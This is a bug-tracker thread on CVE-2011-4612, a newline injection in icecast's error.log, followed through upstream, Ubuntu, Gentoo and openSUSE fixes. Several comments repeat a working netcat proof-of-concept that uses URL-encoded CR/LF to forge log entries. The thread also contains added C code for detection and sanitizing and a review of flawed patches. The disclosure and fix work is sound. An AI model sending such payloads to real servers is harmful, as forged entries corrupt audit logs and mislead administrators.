Newline injection in error.log

Bug #894782 reported by Moritz Naumann on 2011-11-25
This bug affects 2 people
Affects              Status        Importance  Assigned to
Icecast              Fix Released  Unknown
Gentoo Linux         Fix Released  Low
openSUSE             Fix Released  Low
icecast2 (Fedora)    Invalid       Unknown
icecast2 (Ubuntu)    Fix Released  Low         Zubin Mithra

Bug Description

Running this command against an icecast2 running on 127.0.0.1...

echo -ne "GET /non-existent"'"'"%20No%20such%20file%20or%20directory%0d%0a[1970-01-01%20%2000:00:00]%20PHUN%20I'm%20feeling%20phunny%0d%0a["`date "+%Y-%m-%d%%20%%20%H:%M:%S"`"]%20WARN%20fserve/fserve_client_create%20req%20for%20file%20"'"'"/usr/share/icecast2/web/ HTTP/1.0\n\n" | nc -vv 127.0.0.1 8000 > /dev/null

...causes the following to be written to /var/log/icecast2/error.log:
[2011-11-25 15:37:31] INFO fserve/fserve_client_create checking for file /non-existent" No such file or directory
[1970-01-01 00:00:00] PHUN I'm feeling phunny
[2011-11-25 15:37:31] WARN fserve/fserve_client_create req for file "/usr/share/icecast2/web/ (/usr/share/icecast2/web/non-existent" No such file or directory
[1970-01-01 00:00:00] PHUN I'm feeling phunny
[2011-11-25 15:37:31] WARN fserve/fserve_client_create req for file "/usr/share/icecast2/web/)
[2011-11-25 15:37:31] WARN fserve/fserve_client_create req for file "/usr/share/icecast2/web/non-existent" No such file or directory
[1970-01-01 00:00:00] PHUN I'm feeling phunny
[2011-11-25 15:37:31] WARN fserve/fserve_client_create req for file "/usr/share/icecast2/web/" No such file or directory

As you can see above, this allows for falsifying the log file by adding custom messages. Apparently input validation is insufficient and URL-encoded newlines (%0d%0a) are expanded to actual newlines in the log file.

ProblemType: Bug
DistroRelease: Ubuntu 11.10
Package: icecast2 2.3.2-6ubuntu2
ProcVersionSignature: Ubuntu 3.0.0-13.22-generic 3.0.6
Uname: Linux 3.0.0-13-generic x86_64
ApportVersion: 1.23-0ubuntu4
Architecture: amd64
Date: Fri Nov 25 15:38:59 2011
InstallationMedia: Ubuntu 10.10 "Maverick Meerkat" - Release amd64 (20101007)
ProcEnviron:
 PATH=(custom, no user)
 LANG=de_DE.UTF-8
 SHELL=/bin/bash
SourcePackage: icecast2
UpgradeStatus: Upgraded to oneiric on 2011-10-21 (35 days ago)
mtime.conffile..etc.default.icecast2: 2011-11-25T15:30:37.746273
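The forged entries above are only detectable after the fact if something reads error.log with the format in mind. The following is an added example, not code from the report or from the icecast project, that scans constructed log lines modelled on the output above and flags three things: a line whose level tag is not one icecast writes (the set EROR, WARN, INFO, DBUG is an assumption about icecast 2.3), a timestamp that runs backwards relative to the previous line, and a second "[timestamp]" prefix embedded inside a message body (what is left once CR and LF have been replaced with '_'). All function names and the sample lines are mine.

```c
#include <stdio.h>
#include <string.h>

/* Anomaly flags reported for one line of error.log. */
enum { BAD_PREFIX = 1, BAD_LEVEL = 2, TIME_WENT_BACK = 4, NESTED_PREFIX = 8 };

/* Parse the "[YYYY-MM-DD HH:MM:SS] " prefix. Returns a sortable key
 * (YYYYMMDDhhmmss as a number) and points *rest after the prefix,
 * or returns -1 if the prefix is malformed. */
static long long parse_stamp(const char *s, const char **rest)
{
    int y, mo, d, h, mi, sec, n = 0;
    if (sscanf(s, "[%4d-%2d-%2d %2d:%2d:%2d] %n",
               &y, &mo, &d, &h, &mi, &sec, &n) != 6 || n == 0)
        return -1;
    *rest = s + n;
    return ((((y * 100LL + mo) * 100 + d) * 100 + h) * 100 + mi) * 100 + sec;
}

/* Level tags assumed for icecast 2.3: EROR, WARN, INFO, DBUG. */
static int known_level(const char *s, const char **after)
{
    static const char *const levels[] = { "EROR", "WARN", "INFO", "DBUG" };
    for (size_t i = 0; i < sizeof levels / sizeof levels[0]; i++) {
        size_t l = strlen(levels[i]);
        if (strncmp(s, levels[i], l) == 0 && s[l] == ' ') {
            *after = s + l + 1;
            return 1;
        }
    }
    return 0;
}

/* Check one line. *prev_stamp carries the previous line's key (-1 at start). */
int check_log_line(const char *line, long long *prev_stamp)
{
    int flags = 0;
    const char *rest, *msg, *p;
    long long stamp = parse_stamp(line, &rest);
    if (stamp < 0)
        return BAD_PREFIX;
    if (!known_level(rest, &msg)) {
        flags |= BAD_LEVEL;
        msg = rest;
    }
    if (*prev_stamp >= 0 && stamp < *prev_stamp)
        flags |= TIME_WENT_BACK;
    *prev_stamp = stamp;
    /* A second "[timestamp]" inside the message is what a '_'-sanitized
     * injection attempt leaves behind. */
    for (p = msg; (p = strchr(p, '[')) != NULL; p++) {
        const char *unused;
        if (parse_stamp(p, &unused) >= 0) {
            flags |= NESTED_PREFIX;
            break;
        }
    }
    return flags;
}

/* Split text on '\n' (dropping a trailing '\r'), check each line and store
 * its flags in flags[]. Returns the number of lines examined. */
int scan_log(const char *text, int *flags, int max_lines)
{
    long long prev = -1;
    int n = 0;
    const char *p = text;
    while (*p != '\0' && n < max_lines) {
        const char *nl = strchr(p, '\n');
        size_t len = nl ? (size_t)(nl - p) : strlen(p);
        char line[512];
        if (len >= sizeof line) len = sizeof line - 1;
        memcpy(line, p, len);
        line[len] = '\0';
        if (len > 0 && line[len - 1] == '\r') line[len - 1] = '\0';
        flags[n++] = check_log_line(line, &prev);
        if (nl == NULL) break;
        p = nl + 1;
    }
    return n;
}

/* Constructed sample modelled on the report: genuine line, forged "PHUN"
 * line, genuine line, and a message carrying a '_'-sanitized injection. */
static const char SAMPLE_LOG[] =
    "[2011-11-25 15:37:31] INFO fserve/fserve_client_create checking for file /non-existent\n"
    "[1970-01-01 00:00:00] PHUN I'm feeling phunny\n"
    "[2011-11-25 15:37:31] WARN fserve/fserve_client_create req for file \"/usr/share/icecast2/web/non-existent\" No such file or directory\n"
    "[2011-11-25 15:37:32] WARN fserve/fserve_client_create req for file \"/x__[2011-11-25 15:37:32] WARN forged entry\"\n";

int main(void)
{
    int flags[16];
    int n = scan_log(SAMPLE_LOG, flags, 16);
    for (int i = 0; i < n; i++)
        printf("line %d: flags=0x%x%s\n", i + 1, flags[i],
               flags[i] ? "  <-- suspicious" : "");
    return 0;
}
```

Caveat: the third line of the original PoC uses the current date and a valid WARN tag, so a careful attacker produces lines this check cannot distinguish from real ones. The scan catches sloppy injections and confirms that a deployed fix no longer lets CR/LF through; the real control is sanitizing in the log writer.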

CVE References: CVE-2011-4612 (http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4612)
Moritz Naumann (mnaumann) wrote :
visibility: private → public
Changed in icecast2 (Ubuntu):
status: New → Confirmed
Jamie Strandboge (jdstrand) wrote :

Thank you for using Ubuntu and reporting a bug. Because icecast is in universe and community supported, this issue has been forwarded to upstream and oss-security:
http://www.openwall.com/lists/oss-security/2011/12/15/4

Changed in icecast2 (Ubuntu):
importance: Undecided → Low

Jamie Strandboge <email address hidden> reported to the icecast developers (CCing <email address hidden>) the possibility of injecting a fake message into the icecast error log via a specially crafted HTTP request sent to the icecast server port, discovered by Moritz Naumann:

"Newline injection in error.log

Running this command against an icecast2 running on 127.0.0.1...

echo -ne "GET /non-existent"'"'"%20No%20such%20file%20or%20directory%0d%0a[1970-01-01%20%2000:00:00]%20PHUN%20I'm%20feeling%20phunny%0d%0a["`date "+%Y-%m-%d%%20%%20%H:%M:%S"`"]%20WARN%20fserve/fserve_client_create%20req%20for%20file%20"'"'"/usr/share/icecast2/web/ HTTP/1.0\n\n" | nc -vv 127.0.0.1 8000 > /dev/null

...causes the following to be written to /var/log/icecast2/error.log:
[2011-11-25 15:37:31] INFO fserve/fserve_client_create checking for
file /non-existent" No such file or directory
[1970-01-01 00:00:00] PHUN I'm feeling phunny
..."

Source: http://thread.gmane.org/gmane.comp.audio.icecast.devel/1815

Upstream responded that a fixed 2.3.3 version would be released soon.

Thanks for the bug, Petr.

Jamie Strandboge (jdstrand) wrote :

This is CVE-2011-4612

I was able to reproduce the fake log file with the same info as referenced here:
https://bugs.launchpad.net/ubuntu/+source/icecast2/+bug/894782

netcat must be installed, of course.

Your friendly security team received the following report via oss-security.
Please respond ASAP.
The issue is public.

CVE-2011-4612

It was found that remote users could inject newlines into the error.log of icecast, therefore forging log entries.

Citing https://launchpad.net/bugs/894782:

Running this command against an icecast2 running on 127.0.0.1...

echo -ne "GET /non-existent"'"'"%20No%20such%20file%20or%20directory%0d%0a[1970-01-01%20%2000:00:00]%20PHUN%20I'm%20feeling%20phunny%0d%0a["`date "+%Y-%m-%d%%20%%20%H:%M:%S"`"]%20WARN%20fserve/fserve_client_create%20req%20for%20file%20"'"'"/usr/share/icecast2/web/ HTTP/1.0\n\n" | nc -vv 127.0.0.1 8000 > /dev/null

...causes the following to be written to /var/log/icecast2/error.log:
[2011-11-25 15:37:31] INFO fserve/fserve_client_create checking for
file /non-existent" No such file or directory
[1970-01-01 00:00:00] PHUN I'm feeling phunny
..."

bugbot adjusting priority

Zubin Mithra (zubin-mithra) wrote :

Please find attached a debdiff that patches the issue by trimming at occurrences of "\r" or "\n". Tested on lenny. After applying the patch, you have:

$ echo -ne "GET /non-existent"'"'"%20No%20such%20file%20or%20directory%0d%0a[1970-01-01%20%2000:00:00]%20PHUN%20I'm%20feeling%20phunny%0d%0a["`date "+%Y-%m-%d%%20%%20%H:%M:%S"`"]%20WARN%20fserve/fserve_client_create%20req%20for%20file%20"'"'"/usr/share/icecast2/web/ HTTP/1.0\n\n" | nc -vv 127.0.0.1 8000 > /dev/null
Connection to 127.0.0.1 8000 port [tcp/*] succeeded!
$ cat /var/log/icecast2/error.log
[2012-02-20 19:32:34] INFO main/main Icecast 2.3.2 server started
[2012-02-20 19:32:34] INFO connection/get_ssl_certificate No SSL capability
[2012-02-20 19:32:34] INFO stats/_stats_thread stats thread started
[2012-02-20 19:32:34] INFO yp/yp_update_thread YP update thread started
[2012-02-20 19:32:34] INFO fserve/fserv_thread_function file serving thread started
[2012-02-20 19:33:23] INFO fserve/fserve_client_create checking for file /non-existent" No such file or directory (/usr/share/icecast2/web/non-existent" No such file or directory)
[2012-02-20 19:33:23] WARN fserve/fserve_client_create req for file "/usr/share/icecast2/web/non-existent" No such file or directory" No such file or directory

The attachment "icecast2_2.3.2-5ubuntu2.debdiff" of this bug report has been identified as being a patch in the form of a debdiff. The ubuntu-sponsors team has been subscribed to the bug report so that they can review and hopefully sponsor the debdiff. In the event that this is in fact not a patch you can resolve this situation by removing the tag 'patch' from the bug report and editing the attachment so that it is not flagged as a patch. Additionally, if you are member of the ubuntu-sponsors team please also unsubscribe the team from this bug report.

[This is an automated message performed by a Launchpad user owned by Brian Murray. Please contact him regarding any issues with the action taken in this bug report.]

tags: added: patch
Zubin Mithra (zubin-mithra) wrote :

Please find attached a new debdiff which replaces \r and \n with '_', rather than trim the string.

Steve Beattie (sbeattie) wrote :

Zubin, thanks for updating your patch. I see a couple of issues with your patch:

  - the filter loop quits when \0 is reached at the end of the existing path, but never writes \0 to the end of the filtered string. Any attempts to read the filtered string will run off the end of the malloc(3)ed memory and read whatever memory contents happen to be adjacent to it. It may cause the daemon to crash if it hits an unmapped page.

  - the result of strlen(3) is used to calculate the amount of memory to malloc(3) for the filtered string, but strlen(3) reports the length of the string not including the trailing \0. So the allocated array will not have enough room for you to write the trailing \0 once you do so.

Please address these issues and test your fix once you've done so to verify that you've addressed the issue, as well as consider submitting your patch to the upstream icecast project; poking around their svn tree (http://www.icecast.org/svn.php), it appears this issue is still unfixed there as well.
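Two things on this page call for the same small piece of C: the report shows that a percent-encoded "%0d%0a" in the request path is decoded into a literal CR LF and then written to error.log verbatim, and the review above describes the two defects in the first debdiff (no terminating NUL written, and strlen(3) used as the allocation size). The block below is an added example, not the debdiff and not icecast's own code (icecast's real decoder and logger live elsewhere and have different names): a minimal percent-decoder to reproduce the decoded path, a line-break counter, and a sanitizer that replaces CR and LF with '_' while allocating strlen+1 bytes and writing the terminator. The function names and the sample path are assumptions of this example.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Value of one hex digit, or -1 if c is not a hex digit. */
static int hexval(int c)
{
    if (c >= '0' && c <= '9') return c - '0';
    c = tolower(c);
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    return -1;
}

/* Percent-decode a request path the way a web server does before it
 * opens the file. "%0d%0a" becomes a literal CR LF, which is the whole
 * bug: the decoded path is later written into error.log unchanged.
 * Malformed escapes ("%zz", trailing "%4") are copied through as-is.
 * Returns a malloc'ed string the caller frees, or NULL on failure. */
char *url_decode(const char *src)
{
    size_t len = strlen(src), o = 0;
    char *out = malloc(len + 1);      /* decoding never grows the string */
    if (out == NULL) return NULL;
    for (size_t i = 0; i < len; i++) {
        int hi, lo;
        if (src[i] == '%' && i + 2 < len &&
            (hi = hexval((unsigned char)src[i + 1])) >= 0 &&
            (lo = hexval((unsigned char)src[i + 2])) >= 0) {
            out[o++] = (char)(hi * 16 + lo);
            i += 2;
        } else {
            out[o++] = src[i];
        }
    }
    out[o] = '\0';
    return out;
}

/* Number of CR or LF bytes in s: each one starts a new line in the log. */
size_t count_line_breaks(const char *s)
{
    size_t n = 0;
    for (; *s != '\0'; s++)
        if (*s == '\r' || *s == '\n') n++;
    return n;
}

/* Copy s, replacing every CR and LF with '_', so an attacker-controlled
 * string occupies exactly one log line. Both points from the review are
 * handled: allocate strlen(s) + 1 because strlen does not count the
 * terminator, and write the terminating NUL explicitly. */
char *sanitize_for_log(const char *s)
{
    size_t len = strlen(s);
    char *out = malloc(len + 1);
    if (out == NULL) return NULL;
    for (size_t i = 0; i < len; i++)
        out[i] = (s[i] == '\r' || s[i] == '\n') ? '_' : s[i];
    out[len] = '\0';
    return out;
}

int main(void)
{
    /* Constructed request path in the spirit of the report's PoC. */
    const char *raw = "/non-existent%0d%0a[1970-01-01%2000:00:00]%20PHUN%20I'm%20feeling%20phunny";
    char *decoded = url_decode(raw);
    char *safe = decoded ? sanitize_for_log(decoded) : NULL;
    if (decoded == NULL || safe == NULL) return 1;

    printf("decoded path contains %zu line breaks, sanitized copy %zu\n",
           count_line_breaks(decoded), count_line_breaks(safe));
    /* Vulnerable writer: the message spills onto a second, forged line. */
    printf("--- unsanitized ---\n[2011-11-25 15:37:31] INFO fserve/fserve_client_create checking for file %s\n", decoded);
    /* Hardened writer: one line, the injected prefix visibly neutralised. */
    printf("--- sanitized ---\n[2011-11-25 15:37:31] INFO fserve/fserve_client_create checking for file %s\n", safe);
    free(decoded);
    free(safe);
    return 0;
}
```

Replacing rather than truncating keeps the evidence of the attempt in the log, which is why the second debdiff moved from trimming to '_'; the fixed-size allocation and explicit terminator are what the first review comment asked for.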

Steve Beattie (sbeattie) wrote :

Oh, sorry, a couple of other comments:

 - the icecast2 package uses quilt to manage patches, please add your fix to the series of patches there (the Quilt for Debian Maintainers page http://pkg-perl.alioth.debian.org/howto/quilt.html gives more information on how to do that).
 - maverick (Ubuntu 10.10) has the same version of icecast in it; we'll need to update both at the same time or the maverick version will be less than the version in lucid-updates.
 - with that, the version should be 2.3.2-5ubuntu1.10.04.1 (and 2.3.2-5ubuntu1.10.10.1 for maverick-security) not 2.3.2-5ubuntu2; if we weren't updating maverick, the correct version would be 2.3.2-5ubuntu1.1. See https://wiki.ubuntu.com/SecurityTeam/UpdatePreparation#Update_the_packaging on using correct versioning to avoid possible conflicts.

Thanks again.

Zubin Mithra (zubin-mithra) wrote :

Hi Steve,

I've corrected the above mentioned issues; please find attached a patch for lucid; I'll attach a patch for maverick and pass it over upstream asap.

Cheers!

Zubin Mithra (zubin-mithra) wrote :

Hi,

I've attached the patch for maverick along.

Jamie Strandboge (jdstrand) wrote :

Zubin, thank you for your work on these patches. Unfortunately, they are still being patched directly, rather than using the quilt patches system (notice the debian/patches directory-- your patch should be in this directory). As mentioned, please see http://pkg-perl.alioth.debian.org/howto/quilt.html for more information.

Additionally, the patches do not contain DEP-3 comments. These are required for patch attribution, origin, extended description, bugs, etc. Has this patch been forwarded upstream? Does it come from an upstream commit? Has it been reviewed by upstream? This information should be captured in the DEP-3 comments (see http://dep.debian.net/deps/dep3/ for details).

Unsubscribing ubuntu-security-sponsors for now. Please make these adjustments and resubscribe. Thanks again.

Changed in icecast2 (Ubuntu):
status: Confirmed → In Progress
assignee: nobody → Zubin Mithra (zubin-mithra)

The fixed packages for 11.4, 12.1 and FACTORY are submitted via SRID 108146, 108145 and 108151, respectively.

This is an autogenerated message for OBS integration:
This bug (737255) was mentioned in
https://build.opensuse.org/request/show/108145 12.1 / icecast
https://build.opensuse.org/request/show/108146 11.4 / icecast
https://build.opensuse.org/request/show/108151 Factory / icecast

The SWAMPID for this issue is 45905.
This issue was rated as low.
Please submit fixed packages until 2012-04-03.
When done, please reassign the bug to <email address hidden>.
Patchinfo will be handled by security team.

Update released for: icecast, icecast-debuginfo, icecast-debugsource
Products:
openSUSE 11.4 (debug, i586, x86_64)

all released

Gary M (garym) wrote :

xiph.org have just announced version 2.3.3, which includes a fix for CVE-2011-4612 : http://lists.xiph.org/pipermail/icecast/2012-June/012217.html

Changed in opensuse:
importance: Unknown → Low
status: Unknown → Fix Released
Changed in icecast:
status: Unknown → New

Any news? Because 2.3.3 is released.

The 2.3.3 fixes this issue:

r18355 | dm8tbr | 2012-06-07 17:57:11 +0200 (Thu, 07 Jun 2012) | 3 lines
This is part of the patch-set addressing CVE-2011-4612.

Changed in gentoo:
importance: Unknown → Low

2.3.3 now in portage. I can only do a limited testing on my webserver so please give it a try (or please ATs, test as much as you can) before marking it stable.

(In reply to comment #5)
> 2.3.3 now in portage. I can only do a limited testing on my webserver so
> please give it a try (or please ATs, test as much as you can) before marking
> it stable.

Thanks, Markos.

Arches, please test and mark stable:
=net-misc/icecast-2.3.3
Target KEYWORDS: "alpha amd64 ppc ppc64 sparc x86"

I stumbled upon bug 430434.

x86 done, thanks!

ppc done

amd64 done

Changed in icecast:
status: New → Fix Released

alpha/sparc keywords dropped

+ 18 Sep 2012; Kacper Kowalik <email address hidden> icecast-2.3.3.ebuild:
+ ppc64 stable wrt #394847, add missing inherit of user.eclass and explicit
+ RDEPEND

ppc64 stable, last arch done

Thanks, everyone.

GLSA vote: no.

Thanks, folks. GLSA vote: No, too; closing.

Changed in gentoo:
status: Unknown → Fix Released
Changed in icecast2 (Ubuntu):
status: In Progress → Incomplete

Debian has 2.3.3 http://packages.debian.org/source/unstable/icecast2 - how about updating the ubuntu package based on that?

After all the release fixes 3 security issues (out of which probably 2 apply to the default ubuntu package).

CVE-2011-4612 (http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4612):
  icecast before 2.3.3 allows remote attackers to inject control characters
  such as newlines into the error log (error.log) via a crafted URL.

Changed in icecast2 (Ubuntu):
status: Incomplete → Confirmed
status: Confirmed → Incomplete
Jamie Strandboge (jdstrand) wrote :

We are closing this bug report because it lacks the information we need to investigate the problem, as described in the previous comments. Please reopen it if you can give us the missing information, and don't hesitate to submit bug reports in the future. To reopen the bug report you can click on the current status, under the Status column, and change the Status back to 'New'. Thanks again!

Changed in icecast2 (Ubuntu):
status: Incomplete → Invalid
Changed in icecast2 (Fedora):
status: Unknown → Invalid
Jamie Strandboge (jdstrand) wrote :

Actually, Ubuntu 13.04 has the fix as part of 2.3.3-1ubuntu1:
icecast2 (2.3.3-1ubuntu1) raring; urgency=low

  * Merge from debian unstable, remaining changes:
    - 1004_fix_xmlCleanupParser_splatter.patch: Make sure that
      xmlCleanupParser() is only called once: on exit. Doing otherwise
      potentially results in Bad Things (e.g., crashes that point
      incorrectly to PulseAudio).

 -- Lorenzo De Liso <email address hidden> Tue, 04 Dec 2012 16:08:48 +0100

icecast2 (2.3.3-1) unstable; urgency=low

  [ upstream ]
  * New upstream bugfix release.
    + Allow the source password to be undefined. This is to avoid
      falling back to a default password which would be a security
      problem. Fixing #1846
    + Applied justdave's patches, fixing #1717 and #1718. HTTPS now with
      better security and support for chained certificates.
    + trunk/icecast/conf/icecast_minimal.xml.in: Updated <alias> to use
      destination="" not dest="". The old dest="" attribute is still
      supported.
    + Added 'admin' and 'location' to default config, thus fixing #1839.
    + Added VCLT playlist support.
    Closes: bug#652663, which fixes CVE-2011-4612.

Changed in icecast2 (Ubuntu):
status: Invalid → Fix Released